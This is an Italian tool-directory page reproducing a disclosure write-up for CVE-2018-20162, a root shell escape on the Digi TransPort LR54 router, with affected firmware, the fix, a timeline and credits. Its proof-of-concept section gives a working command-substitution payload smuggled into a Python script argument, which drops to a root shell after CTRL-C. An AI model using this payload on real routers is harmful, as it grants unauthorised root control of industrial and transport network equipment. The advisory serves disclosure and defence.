Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape — Exploit proof-of-concept per CVE-2018-20162: fuga dalla sandbox nel router Digi TransPort LR54 LTE tramite un difetto nella gestione di SIGINT, che concede accesso a root shell. | Kitploit
Strumenti/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
Sicurezza Sistemi EmbeddedEscalation di PrivilegiSicurezza IoTAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Hardware e IoTRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

Exploit proof-of-concept per CVE-2018-20162: fuga dalla sandbox nel router Digi TransPort LR54 LTE tramite un difetto nella gestione di SIGINT, che concede accesso a root shell.

Vedi Repository
2177 anni faNon ancora revisionato

layout: post title: "CVE-2018-20162: Escape dalla shell limitata su Digi TransPort LR54" author: sgo category: sicurezza

Il Digi TransPort LR54 è un router LTE ad alta velocità comunemente utilizzato in ambito industriale, infrastrutturale, retail e trasporti pubblici.

Supporta l'esecuzione di script Python in un sandbox limitato e dispone di una shell personalizzata accessibile via SSH, soggetta alle stesse restrizioni. Il sistema operativo sottostante è quindi inaccessibile all'amministratore.

Ho trovato un modo per uscire dal sandbox e ottenere una shell di root sfruttando il modo in cui la CLI gestisce gli argomenti della riga di comando durante l'esecuzione di script Python:

Quando un processo Python interattivo riceve un SIGINT (tramite CTRL-C), gli argomenti dello script non vengono correttamente escapati quando vengono passati all'handler di logging degli errori della CLI interattiva. Ciò consente a un attaccante di eseguire comandi arbitrari come root.

Per sfruttare questa vulnerabilità, un attaccante deve avere accesso interattivo alla CLI con privilegi 'super'. Un utente con questo livello di accesso è abilitato per impostazione predefinita sul dispositivo.

Vulnerabile

Digi Transport LR54 (e forse prodotti correlati come WR64 e WR54)

Versione firmware : 4.4.0.26 29/10/2018 21:14:06 Versione firmware : 4.3.2.24 06/09/2018 00:58:34

E forse versioni precedenti

Mitigazione

Gli utenti dovrebbero aggiornare alla versione firmware 4.5.1.4 o successiva. I segreti memorizzati sul dispositivo, come chiavi private e passphrase, dovrebbero essere cambiati come precauzione.

Proof of Concept

  1. Carica sleep.py sul LR54 usando scp o sftp, contenente:
import time;time.sleep(10)
  1. Esegui il seguente comando nella CLI del LR54:
python sleep.py --XXX $(/bin/sh -i >&2)
  1. Premi immediatamente CTRL-C dopo l'avvio del programma

  2. Vieni quindi rilasciato in una shell interattiva di root

/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Cronologia

  • 2018-12-13: Vulnerabilità scoperta
  • 2018-12-14: PoC creato, fornitore notificato
  • 2018-12-14: Fornitore confermato, embargo di 60 giorni. Richiesto CVE.
  • 2018-12-15: Assegnato CVE-2018-20162
  • 2018-12-31: Ricevuto firmware pre-release. Confermato non vulnerabile.
  • 2019-01-02: Il fornitore rilascia firmware corretto 4.5.1.4
  • 2019-01-25: Il fornitore aggiorna le note di rilascio per riferire CVE-2018-20162
  • 2019-02-13: Il fornitore ha approvato la divulgazione, embargo revocato

Riferimenti

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Crediti

Vulnerabilità scoperta da Stig Palmquist.

Grazie a @duniel_pls e @alexanderkjall per la revisione di questo rapporto.

Scarica lo strumento